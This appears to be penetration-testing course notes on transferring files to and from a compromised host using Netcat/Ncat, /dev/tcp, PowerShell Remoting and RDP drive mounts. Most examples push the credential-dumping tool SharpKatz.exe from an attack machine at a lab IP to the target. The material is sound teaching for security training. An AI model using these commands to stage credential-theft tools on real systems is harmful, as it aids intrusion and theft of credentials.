# Miscellaneous File Transfer Methods ## File Transfer with Netcat and Ncat {% hint style="info" %} NCat is the NMap updated and maintained verison of the original Netcat (not maintained anymore) {% endhint %} ### Target Machine ```bash nc -l -p 8000 > SharpKatz.exe ``` If the compromised machine is using Ncat, we'll need to specify `--recv-only` to close the connection once the file transfer is finished. ```bash ncat -l -p 8000 --recv-only > SharpKatz.exe ``` ### Attack machine ```bash nc -q 0 192.168.49.128 8000 < SharpKatz.exe ``` By utilizing Ncat on our attacking host, we can opt for `--send-only` rather than `-q`. The `--send-only` flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with `--send-only`, there is no need to anticipate further incoming information. ```bash ncat --send-only 192.168.49.128 8000 < SharpKatz.exe ``` ### **Attack Host - Sending File as Input to Netcat** ```bash sudo nc -l -p 443 -q 0 < SharpKatz.exe ``` ```bash sudo ncat -l -p 443 --send-only < SharpKatz.exe ``` ### **Target - Connect to Netcat to Receive the File** ```bash nc 192.168.49.128 443 > SharpKatz.exe ``` ```bash ncat 192.168.49.128 443 --recv-only > SharpKatz.exe ``` ### **Target - Connecting to Netcat Using /dev/tcp to Receive the File** ```bash cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe ``` ## PowerShell Session File Transfer We already talk about doing file transfers with PowerShell, but there may be scenarios where HTTP, HTTPS, or SMB are unavailable. If that's the case, we can use [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2), aka WinRM, to perform file transfer operations. [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2) allows us to execute scripts or commands on a remote computer using PowerShell sessions. Administrators commonly use PowerShell Remoting to manage remote computers in a network, and we can also use it for file transfer operations. By default, enabling PowerShell remoting creates both an HTTP and an HTTPS listener. The listeners run on default ports TCP/5985 for HTTP and TCP/5986 for HTTPS. To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the `Remote Management Users` group, or have explicit permissions for PowerShell Remoting in the session configuration. ### **From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.** ```powershell Test-NetConnection -ComputerName DATABASE01 -Port 5985 ``` ### **Create a PowerShell Remoting Session to DATABASE01** ```powershell $Session = New-PSSession -ComputerName DATABASE01 ``` ### **Copy samplefile.txt from our Localhost to the DATABASE01 Session** ```powershell Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ ``` ### **Copy DATABASE.txt from DATABASE01 Session to our Localhost** ```powershell Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session ``` ## RDP ### **Mounting a Linux Folder Using rdesktop** ```shell-session rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` ### **Mounting a Linux Folder Using xfreerdp** ```shell-session xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` ### Windows Native [mstsc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc) remote desktop client can be used